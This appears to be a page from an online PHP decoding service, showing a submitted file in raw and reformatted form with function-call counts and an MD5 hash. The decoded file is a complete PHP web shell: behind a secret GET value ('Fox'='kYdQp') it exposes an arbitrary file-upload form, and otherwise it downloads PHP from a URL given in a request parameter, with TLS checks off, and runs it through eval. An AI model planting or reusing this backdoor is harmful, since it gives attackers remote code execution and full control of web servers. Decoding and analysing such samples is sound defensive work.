Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php error_reporting(0); echo php_uname()."<br>".getcwd()."<br>"; if($_GET['Fox'] == 'kYd..

Decoded Output download

<?php error_reporting(0);
echo php_uname() . "<br>" . getcwd() . "<br>";
if ($_GET['Fox'] == 'kYdQp') {
    $saw1 = $_FILES['file']['tmp_name'];
    $saw2 = $_FILES['file']['name'];
    echo "<form method='POST' enctype='multipart/form-data'><input type='file' name='file' /><input type='submit' value='UPload' /></form>";
    move_uploaded_file($saw1, $saw2);
    exit(0);
}
$code = "http://" . $_GET["php"];
if (empty($code) or !stristr($code, "http")) {
    exit;
} else {
    $php = file_get_contents($code);
    if (empty($php)) {
        $php = curl($code);
    }
    $php = str_replace("<?php", "", $php);
    $php = str_replace("?>", "", $php);
    eval($php);
}
function curl($url) {
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_TIMEOUT, 40);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, TRUE);
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0");
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, TRUE);
    if (stristr($url, "https://")) {
        curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, 0);
        curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);
    }
    curl_setopt($curl, CURLOPT_HEADER, false);
    return curl_exec($curl);
} ?>

Did this file decode correctly?

Original Code

<?php error_reporting(0); echo php_uname()."<br>".getcwd()."<br>"; if($_GET['Fox'] == 'kYdQp'){$saw1 = $_FILES['file']['tmp_name'];$saw2 = $_FILES['file']['name'];echo "<form method='POST' enctype='multipart/form-data'><input type='file' name='file' /><input type='submit' value='UPload' /></form>"; move_uploaded_file($saw1,$saw2); exit(0); } $code = "http://".$_GET["php"]; if (empty($code) or !stristr($code, "http")){ exit; } else { $php=file_get_contents($code); if (empty($php)){ $php = curl($code); } $php=str_replace("<?php", "", $php); $php=str_replace("?>", "", $php); eval($php); } function curl($url) { $curl = curl_init(); curl_setopt($curl, CURLOPT_TIMEOUT, 40); curl_setopt($curl, CURLOPT_RETURNTRANSFER, TRUE); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, TRUE); if (stristr($url,"https://")) { curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0); } curl_setopt($curl, CURLOPT_HEADER, false); return curl_exec ($curl); } ?>

Function Calls

php_uname 1
getcwd 1
error_reporting 1

Variables

None

Stats

MD5 ac6e251011e47735463c0d8cc9f24d42
Eval Count 0
Decode Time 110 ms